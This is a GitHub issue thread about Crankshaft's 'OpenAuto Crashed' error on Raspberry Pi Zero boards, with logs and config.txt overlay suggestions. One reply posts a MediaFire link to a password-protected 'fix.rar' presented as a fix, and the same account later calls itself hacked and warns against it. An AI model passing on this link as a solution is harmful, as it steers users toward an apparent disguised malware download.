opencardev/crankshaft #676: OpenAuto Crash on RPi Zero

Aethox, 2024-08-26:
OS: v2022.09.12.1 & alpha-7.5 2022-06-29
RPi zero

I am trying to setting up the OS into raspberry pi Zero, but it won't boot, the error message says that "OpenAuto Crashed". I've already change the gpu_mem value into boot\config.txt but still unable to boot. Maybe someone have tried installing the OS into the same RPi, or can manage the error. I attached the debuglog if needed

[debug.zip](https://github.com/user-attachments/files/16750990/debug.zip)

YoungAgile, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

Aethox, 2024-08-26:
> Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."

Hi! Sorry but I don't understand your fix, could you explain me more please?

YoungAgile, 2024-08-26:
> > Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."
> 
> Hi! Sorry but I don't understand your fix, could you explain me more please?

Sorry, the account has been hacked. Please do not click on this link.

Aethox, 2024-08-26:
> > > Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."
> > 
> > 
> > Hi! Sorry but I don't understand your fix, could you explain me more please?
> 
> Sorry, the account has been hacked. Please do not click on this link.

Sure, that's what i thought

wjcarpenter, 2024-09-11:
I don't have any experience with RPi Zero, and after a quick look through your logs didn't spot anything obvious (to my non-expert eyes). I did notice one curious thing, though: there is no openauto.log or openauto.ini in your debug.zip.

BTW, in my experiments on an RPi 3B+, I sometimes see that "openauto crashed" message, but it has always gone away if I re-burn the image on my SD card or USB drive. (I've never figured out why the crash happens, but just assume some flaw in how I created the burned the crashing image.)

georgi-m-iliev, 2024-10-04:
I think I might have found the solution to this! I am trying to deploy Crankshaft on a Pi Zero too (Zero 2 W)! And was getting this error when using EGL mode, booted fine on X11. Check if you have the following overlay in the config.txt file:

`dtoverlay=vc4-fkms-v3d
`

This fixed it for me and now everything works like a charm! (Hope I don't jinx it though). Hope it works for you too, although a little bit late.

wjcarpenter, 2024-10-04:
@georgi-m-iliev I had tried both EGL and X11 quite a while ago with no success. I just tried it again and still no success. I'm on a Pi 3B+. I did have that dtoverlay enabled config.txt, so I also tried commenting it out in case that's what you meant. No joy.

It's cool that you got it working. Are you running the stock release of CS or something you built yourself?

I don't see a reason that EGL-vs-X11 would work for the older AA app and fail with a newer one, but there's a lot I don't know about how the AA and CS pieces fit together.

Anybody else getting it working this way?

NarenHT, 2024-11-24:
@Aethox Did this work on Pi Zero 1W? Looking to start a build with one.